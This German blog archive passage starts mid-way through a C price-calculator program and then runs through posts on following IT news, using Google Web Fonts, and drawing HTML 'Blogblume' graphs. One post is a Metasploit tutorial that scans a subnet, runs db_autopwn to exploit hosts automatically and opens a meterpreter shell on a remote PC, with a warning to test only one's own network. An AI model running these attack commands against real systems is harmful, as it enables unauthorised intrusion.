Funktion readLieferung() - scanf with check
============================================================================
*/
int readLieferung(void)
/*
Rückgabewert:    iLieferung ==> Lieferung (1 | 0)
Es werden keine Argumente übergeben!
*/
{
   int iLieferung=0;
   char cInput;   
   do 
   {
      printf("\tLieferung: ('j' fuer ja) ");
      // Einlesen der Lieferung
      scanf("%c", &cInput);
      new_fflush();
      if (!isalpha(cInput))
      {
         printf("\n\n**Bitte eine korrekte Eingabe taetigen!!!**\n\n");
      }
   } 
   while (!isalpha(cInput));
   if (cInput == 'j') 
   {
      iLieferung=true;
   }
   return iLieferung;
}

/*
============================================================================
Funktion readKundenNr() - scanf with check
============================================================================
*/
int readKundenNr(void)
/*
Rückgabewert:    iKundenNr ==> Kunden-Nr.
Es werden keine Argumente übergeben!
*/
{
   int check=true, iKundenNr;
   do 
   {
      printf("\n\tKunden-Nr.: ");
      // Einlesen der iKundenNr
      check = !scanf("%d", &iKundenNr);
      new_fflush();
      if (check)
      {
         printf("\n\n**Bitte eine korrekte Kunden-Nr. eingeben!!!**\n\n");
      }
   } 
   while (check);
   return iKundenNr;
}

/*
============================================================================
Funktion printMenu() - Ausgabe vom Menue
============================================================================
*/
int printMenu(void) 
/*
Rückgabewert:    0 ==> alles OK
Es werden keine Argumente übergeben!
*/
{
   printf("\n\tP R E I S K A L K U L A T I O N");
   printf("\n\t===============================");
   printf("\n\n\ta: Standardkonfiguration");
   printf("\n\n\tb: Einzelkomponenten");
   printf("\n\n\tc: Warenkorb anzeigen"); 
   printf("\n\n\td: Suchen (Kunden-Name)");
   printf("\n\n\te: Suchen (Kunden-Nr.)");
   printf("\n\n\tf: Loeschen");
   printf("\n\n\tx: Ende");
   printf("\n\n\n\tAuswahl: ");
   return 0;
}

/*
============================================================================
Funktion printMenuStandard() - Ausgabe vom Standard-Menue
============================================================================
*/
int printMenuStandard(void) 
/*
Rückgabewert:    0 ==> alles OK
Es werden keine Argumente übergeben!
*/
{
   printf("\n\tS T A N D A R D K O N F I G U R A T I O N");
   printf("\n\t=========================================");
   printf("\n\n\t1: %s\t\t%5.2f", FUNSTAR_NAME, FUNSTAR_PREIS);
   printf("\n\t2: %s\t\t%5.2f", HIGHEND_NAME, HIGHEND_PREIS);
   printf("\n\t3: %s\t% 5.2f", MULTIMEDIASTAR_NAME, MULTIMEDIASTAR_PREIS);
   printf("\n\t4: %s\t\t%5.2f", OFFICESTAR_NAME, OFFICESTAR_PREIS);
   printf("\n\t0: Abbruch");
   printf("\n\n\n\tAuswahl: ");
   return 0;
}

/*
============================================================================
Funktion printMenuEinzel() - Ausgabe vom Einzel-Menue
============================================================================
*/
int printMenuEinzel(void) 
/*
Rückgabewert:    0 ==> alles OK
Es werden keine Argumente übergeben!
*/
{
   printf("\n\tE I N Z E L K O M P O N E N T E N");
   printf("\n\t=================================");
   printf("\n\n\t1: %s", GEHAEUSE_NAME);
   printf("\n\t2: %s\t\t%5.2f", MAINBOARD_NAME, MAINBOARD_PREIS);
   printf("\n\t3: %s\t\t\t%5.2f", CPU_NAME, CPU_PREIS);
   printf("\n\t4: %s\t\t%5.2f", FESTPLATTEN_NAME, FESTPLATTEN_PREIS);
   printf("\n\t5: %s\t\t%5.2f", GRAFIKKARTEN_NAME, GRAFIKKARTEN_PREIS);
   printf("\n\t0: Abbruch");
   printf("\n\n\n\tAuswahl: ");
   return 0;
}

/*
============================================================================
Funktion printMenuEinzel() - Ausgabe vom Einzel-Menue
============================================================================
*/
int printMenuGehaeuse(void) 
/*
Rückgabewert:    0 ==> alles OK
Es werden keine Argumente übergeben!
*/
{
   printf("\n\tG E H A E U S E K O M P O N E N T E N");
   printf("\n\t=====================================");
   printf("\n\n\t1: %s\t %5.2f", LX100_NAME, LX100_PREIS);
   printf("\n\t2: %s\t %5.2f", LX120_NAME, LX120_PREIS);
   printf("\n\t3: %s\t%5.2f", LX34A_NAME, LX34A_PREIS);
   printf("\n\t0: Abbruch");
   printf("\n\n\n\tAuswahl: ");
   return 0;
}

News im Internet suchen / filtern / finden

Heute wollte ich beschreiben, wie ich mich über IT-News informiere, denn jeder der sich mit dem Thema „IT“ beschäftigt bemerke schnell das aktuelle Informationen sehr wichtig sind, wenn z.B. eine Sicherheitslücke bekannt wird, Updates für bestimmte Programme anstehen oder man sich „einfach“ über neue Technologien / Programme / etc. informieren möchte.


[stextbox id=“info“]An alle IT-Blogger: Ich bin immer auf der Suche nach neuen IT-Blogs und interessanten IT-News, daher würde ich euch bitten, folgende Angaben als Kommentar zu hinterlassen, so dass ich euch folgen und eure Nachrichten lesen kann, thx.[/stextbox]

  1. RSS-Feed
  2. ggf. Twitter/Identi.ca – Account
  3. ggf. Facebook-Fanpage


Google-Reader

Der Google Reader ist sehr praktisch, da man nicht die verschiedenen News-Seiten besuchen muss, man hat alle Informationen auf einem Blick zusammen. (Im RSS-Feed bitte immer ganze Artikel anzeigen lassen, anders macht RSS keinen Sinn!!!) Zudem kann man im Google-Reader auch bei anderen Google-Usern (Buzz) mitlesen, welche wiederum Infos/News weiterempfehlen können, so baut man sich schnell seine persönliche kleine News-Zentrale zusammen. Damit das ganze nicht unübersichtlich wird, sollte man die RSS-Feed in einzelne Ordner (Kategorien) speichern. Die Krönung ist ganzen ist dann, wenn du dir das Google-Reader App auf deinem Android-Smartphone installierst und immer alle aktuellen News abrufbereit in der Tasche hast.

Tipp: Per iGoogle (Google – Startseite) kannst du dir deine Google-Reader News auch anzeigen lassen und mehr viele weitere Infos wie z.B. das Wetter etc.


Auf speziellen Webseiten, werden auch RSS-Feed von Blogs zusammengefasst, so dass man diese nicht selber organisieren muss bzw. auch neue Blogs / News findet. Wer sich für das Thema (RSS-Sammlung -Planet) interessiert, kann sich eine solche Software ggf. auch selber installieren – www.planetplanet.org

z.B.:


+ News werden archiviert

+ Ordner erleichtern die Verwaltung

+ komplette News auf einer Webseite

unübersichtlich, bei vielen Abos

ggf. doppelte News bei mehreren Abos


google_reader
google_reader


der bessere Google-Reader – feedly.com

Auch wenn die Technik vom Google-Reader schon sehr gut ist, wirklich ansprecht / übersichtlich sieht es nicht wirklich aus, daher nutze ich www.feedly.com. (verfügbar für Chrome, Firefox, Safari) Die einzelnen Kategorien vom Google-Reader kannst du dir nun übersichtlich in einer Art Zeitungsformat anzeigen lassen und bekommst viele weiter News Empfehlungen.


+ Ordner erleichtern die Verwaltung

+ komplette News auf einer Webseite

+ News werden gewichtet

+ Übersichtliche Darstellung

nur im Browser verfügbar (App ist jedoch in Arbeit)


feedly
feedly


News für unterwegs

Wenn man aus welchem Grund auch immer unterwegs (offline) News lesen möchte, kann man sich auch mehrere RSS-Feed per E-Mail zuschicken lassen und zwar auf tabbloid.com. Außerdem nutze ich auch noch readitlaterlist.com, wir der Name (Read It Later) schon sagt, kann man hier bequem Webseiten abspeichern und später offline lesen.

Tipp: Für „Read It Later“ gibt es auch Apps für dein Smartphone, falls du keine Internetflat hast. ;-)


+ Internet wird nicht ständig benötig

ein wenig unübersichtlich (readitlaterlist.com)

unübersichtlich (tabbloid.com)


multi_RSS_per_pdf
multi_RSS_per_pdf


read_it_later
read_it_late


E-Mail (Newsletter)

Vor einiger Zeit habe ich mit mich darauf beschränkt (am Morgen) auf der Arbeit die IT-News des Tages per E-Mail zu lesen. Daher kann man meine Blog-Beiträge auch per E-Mail empfangen, dies lässt sich sehr einfach per RSS + FeedBurner realisieren.

Tipp: Unter Linux (Arch Linux & Ubuntu) nutzte ich „Claws Mail“ als E-Mail Client. :-)


z.B.:


+ News werden archiviert

+ Filter-Regeln, erleichtern die Organisation

unübersichtlich, bei vielen E-Mails / Abos

ggf. doppelte News bei mehreren Abos


Twitter

Wer ein wenig Zeit mitbringt, kann auf Twitter auch viele neue Leute kennen lernen und interessante News in der „Timeline“ lesen, ich folge hier vielen IT-Bloggern und kann jedem der Twitter nutzt nur empfehlen Twitter-Listen anzulegen, um ein wenig Ordnung in die Informationsflut zu bekommen. z.B.: twitter.com/suckup_de/lists Indem andere diese Listen wiederum abonnieren, kann man auch ohne viel Zeitaufwand vielen News finden.

Tipp: Wer eine freie Alternative zu Twitter sucht sollte sich einmal identi.ca anschauen…


+ News in Echtzeit

+ Listen erleichtern die Verwaltung

unübersichtlich Timeline, bei vielen Nachrichten

spezielle News werden schnell überlesen

doppelte News


Twitter_Listen
Twitter_Listen


Twitter_IT-Blogger
Twitter_IT-Blogger

Online-Zeitung (Twitter)

Als Ergänzung zu Twitter möchte ich an dieser Stelle kurz „Twittertim.es“ und „paper.li“ vorstellen. Bei Twittertim.es kann man aus seiner Timeline eine Zeitung generieren, die Reihenfolge der Beiträge ergeben sich daraus, wie viele Bekannte diese Nachricht ebenfalls erwählt haben. paper.li ist ebenfalls ein Online-Zeitungs-Dienst, welcher Twitter und ggf. Facebook Meldungen (News) verarbeitet. Der Vorteil von paper.li ist der, dass man auch die erwähnten Twitter-Listen als ansprechende Zeitung publizieren und abonnieren kann. z.B.: paper.li/suckup_de/it-nachrichten


+ News werden gewichtet

+ Übersichtliche Darstellung

spezielle News werden ggf. nicht anzeigt


paper_politik
paper_politik


Social-News

Ergänzend zu den bisher Vorgestellen News-Quellen schaue ich teilweise auch in sogenannte Social-News, dort können User (du und ich) Nachrichten einreichen, diese können dann von anderen gepusht werden. Um so mehr Stimmen ein Beitrag erhält, desto weiter vorne (oben) wird dieser Angezeigt.

z.B.:


+ News werden gewichtet

ggf. unrelevante / uninteressante News

spezielle News werden schnell überlesen

etwas unübersichtlich


Podcasts (Audio-News)

Sehr schön finde ich auch Padcasts, wo sehr liebe Menschen News zusammentragen, diese als eine Art Radiosendung verpacken und als Audio-File anbieten. Solch ein Podcast kannst man sich jedoch nur anhören, wenn man auch die Zeit mitbringt! z.B. auf dem Weg zur Arbeit / im Zug / oder einfach gemütlich zu Hause. ;-)

z.B.:


+ ausführliche News

+ irgendwie persönlicher als ein heise-Artikel :-)

festgelegte Themenauswahl

ggf. lange Laufzeit

Google – Neue Schriftarten für deine Webseite

„Alle aktuellen Browser können Schriftarten per CSS vom Server holen, um die auf dem Rechner vorinstallierte Auswahl von Fonts zu ergänzen und Webdesignern typografische Handlungsfreiheit zu ermöglichen. In der Praxis scheitern diese Webfonts bisher aber oft am technischen Aufwand, an Lizenzfragen und an unterschiedlichen Implementierungen in den Browsern. Die auf der Google-Entwicklerkonferenz Google I/O vorgestellten Google Font API und Google Font Directory könnten dieser Technik endlich zum Durchbruch verhelfen und das Aussehen von Webseiten nachhaltig verändern.“ – heise.de


Google Font Directory
Google Font Directory


Google Web Schriftarten sind mit folgenden Browsern kompatibel:

  • Google Chrome: 4.249.4+
  • Mozilla Firefox: 3.5+
  • Apple Safari: 3.1+
  • Microsoft IE: 6+


1.) Und -> hier <- gibt es ein kleines HowTo von Google, welches zeigt, dass man als erstes folgendes (ggf. Rennie Beanie gegen eine andere Schriftart austauchen) im HTML-Quellcode einfügen muss…



href='http://fonts.googleapis.com/css?family=Reenie+Beanie' rel='stylesheet' type='text/css'>


… du kannst diese Fonts/Schriftarten und auch die nachfolgenden Modifizierungen (CSS) mit WordPress auch über ein Plugin (WP Google Fonts) einstellen.


2.) Als nächstes können wir die Schriftart noch per CSS modifizieren …

.PostHeader a:link
{
font-family: 'Reenie Beanie', Arial, Sans-Serif;
font-size: 32px;
text-decoration: none;
text-align: left;
color: #265273;
}


3.) … und dies z.B. folgendermaßen als Überschrift für WordPress in der Datei (single.php) verwenden. Wie das Ergebnis am Ende aussieht, kannst du hier im Blog sehen. ;-)


<span><h1><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title(); ?>"><?php the_title(); ?></a></h1></span>


4.) Wer will kann auch erst eine normale Schrift anzeigen lassen und dann die Google-Fonts per JavaScript laden lassen… -> hier <- gibt es diesbezüglich weitere Infos.


<html>
 <head>
 <script type="text/javascript">
 WebFontConfig = {
 google: { families: [ 'Tangerine', 'Cantarell' ] }
 };
 (function() {
 var wf = document.createElement('script');
 wf.src = ('https:' == document.location.protocol ? 'https' : 'http') +
 '://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js';
 wf.type = 'text/javascript';
 wf.async = 'true';
 var s = document.getElementsByTagName('script')[0];
 s.parentNode.insertBefore(wf, s);
 })();
 </script>
 <style type="text/css">
 .wf-loading p {
 font-family: serif
 }
 .wf-inactive p {
 font-family: serif
 }
 .wf-active p {
 font-family: 'Tangerine', serif
 }
 .wf-loading p {
 font-family: serif;
 font-size: 16px
 }
 .wf-inactive h1 {
 font-family: serif;
 font-size: 16px
 }
 .wf-active h1 {
 font-family: 'Cantarell', serif;
 font-size: 16px
 }
 </style>
 </head>
 <body>
 <h1>This is using Cantarell</h1>
 <p>This is using Tangerine!</p>
 </body>
</html>

Metasploit – Sicherheitsanalyse im Netzwerk


Metasploit
Metasploit


„Das Metasploit-Projekt ist ein freies Open-Source-Projekt zur Computersicherheit, das Informationen über Sicherheitslücken bietet und bei Penetrationstests sowie der Entwicklung von IDS-Signaturen eingesetzt werden kann. Das bekannteste Teilprojekt ist das Metasploit Framework, ein Werkzeug zur Entwicklung und Ausführung von Exploits gegen verteilte Zielrechner. Andere wichtige Teilprojekte sind das Shellcode-Archiv und Forschung im Bereich der IT-Sicherheit.

Wie vergleichbare kommerzielle Lösungen wie CANVAS (von Immunity) oder Core Impact (von Core Security Technology), kann Metasploit von Administratoren eingesetzt werden, um die Schwachstellen von Computersystemen zu prüfen und diese bei Bedarf zu schließen. Andererseits kann es auch missbraucht werden, um in andere Systeme einzubrechen. Während der beschriebene Einsatz durch einen Administrator in seinem eigenen Netzwerk nicht nur legitim, sondern auch legal ist, erfüllt ein Einsatz ohne ausdrückliche Erlaubnis bei Fremdsystemen Tatbestände der Computerkriminalität.“ – Wiki


[stextbox id=“alert“ caption=“Achtung“]Ausdrücklich möchte ich noch einmal darauf hinweisen, dass man dieses Programm nur zur Analyse des eigenen Netzwerkes nutzen darf![/stextbox]


hackingprocess
hackingprocess


Als erstes müssen wir einige Dinge nachinstallieren um „unser eigenes“ Netzwerk bzw. die Rechner in diesem auf Exploits zu prüfen und spätestens jetzt bemerkt man, dass ein Patch-Day im Monat ggf. nicht ausreicht, sobald man auf eine globale Exploit-Datenbank zurückgreifen kann ;-) …

aptitude install ruby postgres libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby  libreadline-ruby libiconv-ruby libgtk2-ruby libglade2-ruby rubygems libpq-dev libreadline-dev libssl-dev libpq5 ruby-dev
sudo gem install pg


Optional: falls du später Probleme hast, dich mir postgres-SQL zu verbinden
vim /etc/postgresql/8.3/main/postgresql.conf
#ssl = true
sudo /etc/init.d/postgresql restart


… und müssen eine Datenbank-User / Datenbank anlegen.
sudo -s
su postgres
createuser msf_user -P
Enter password for new role: *******
Enter it again: *******
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
createdb --owner=msf_user msf_database


Optional: weitere Infos zu Postgres + Metasploit


Optional: ggf. nach einer neuen Version schauen…


32-Bit:
wget http://www.metasploit.com/releases/framework-3.5.1-linux-i686.run
64-Bit:
wget http://www.metasploit.com/releases/framework-3.5.1-linux-x86_64.run


sudo sh ./framework-3.5.1*
sudo rm -rf /opt/metasploit3/msf3/
sudo svn checkout https://www.metasploit.com/svn/framework3/trunk /opt/metasploit3/msf3/


Optional: für zukünftige Updates
sudo svn update /opt/metasploit3/msf3/


Nun noch schnell das einen Link anlegen …
sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/


… und verhindern, dass PostgreSQL immer automatisch startet.
update-rc.d -f postgresql remove


Optional: ggf. falls der PC in der Zwischenzeit neu-gestartet wurde, starten wir nun PostgreSQL…


sudo /etc/init.d/postgresql start
… führen eben noch ein Update von Metasploit durch und startet diese anschließend …
sudo msfupdate
sudo msfconsole
*abwarten, kann einen Augenblick dauern*


metasploit
metasploit


msf > db_driver postgresql
msf > db_connect msf_user:[password]@127.0.0.1:5432/msf_database
msf > db_workspace -a meinProjekt
msf > db_nmap 192.168.50.0/24
msf > db_hosts
msf > db_services
msf > db_autopwn -t -p -e
msf > session -i 1
meterpreter >
Wir befinden uns nun in einer Shell auf dem Remote-PC und können verschiedene Befehle ausführen z.B.:
ipconfig
execute
shell
download
upload 
… genauer will ich auf die Shell auch nicht eingehen, denn weitere Infos findet man z.B. hier:


fastandeasyhacking
fastandeasyhacking


Wenn man gerne nun noch eine hübsche grafische Oberfläche hätte, kann man sich diese GUI installieren oder „msfgui“ ausprobieren. :-) Um die neue Metasploit-GUI zu nutzen müssen wir jedoch als erstes Java installieren…
sudo add-apt-repository "deb http://archive.canonical.com/ lucid partner"
sudo apt-get update
sudo apt-get install sun-java6-jdk
Ggf. noch einmal nach einer neue Version auf der Webseite schauen – www.fastandeasyhacking.com
Optional: ggf. falls der PC in der Zwischenzeit neu-gestartet wurde, starten wir nun PostgreSQL…
sudo /etc/init.d/postgresql start
sudo msfconsole
*abwarten, kann einen Augenblick dauern*
msf > load xmlrpc
… nun steht in der Konsole ein Passwort (+User), welches gleich in der GUI eingegeben werden muss, also neue Konsole öffnen und anschließend die neue GUI herunterladen.
cd ~/Desktop/
wget http://www.fastandeasyhacking.com/download/armitage122210.tgz
tar xzvf armitage122210.tgz
cd armitage/
./armitage.sh
Nachdem die Software gestartet wurde, müssen wir noch schnell das soeben beschriebene Passwort (+User) und noch den Befehl zum Verbinden mit der Datenbank eintragen …
… anschließend können wir das Netzwerk scannen und ggf. Sicherheitslücken entdecken …


Armitage_start
Armitage_start


Menü:
Hosts -> Clear Hosts
Hosts -> Nmap Scan -> Quick Scan (OS detect)
Services
Services


Auswahl
Auswahl


… genauer will ich auf die GUI auch nicht eingehen, denn weitere Infos findet man z.B. hier:

Blogblume V3.0

Naja eigentlich ist es für mich meine erste Blogblume daher V1.0. In der Blogparade auf „blogblume.de“ geht es darum, eine „Blume zu pflanzen“ (mithilfe von HTML Graph) aber noch schönes als das Bild das an Ende dabei herauskommt, ist der Aufbau dieser „Blume“, daher einfach selber ausprobieren… :-)


Blogblume - Januar 2011
Blogblume - Januar 2011


Webseite -> Blume


  • blue: für links (der A tag)
  • red: für Tabellen (TABLE, TR and TD tags)
  • green: für den DIV tag
  • violet: für Bilder (der IMG tag)
  • yellow: für Formulare (FORM, INPUT, TEXTAREA, SELECT und OPTION tags)
  • orange: für Zeilenumbrüche und Zitatblöcke (BR, P, und BLOCKQUOTE tags)
  • black: der HTML tag, das root node
  • gray: alle anderen tags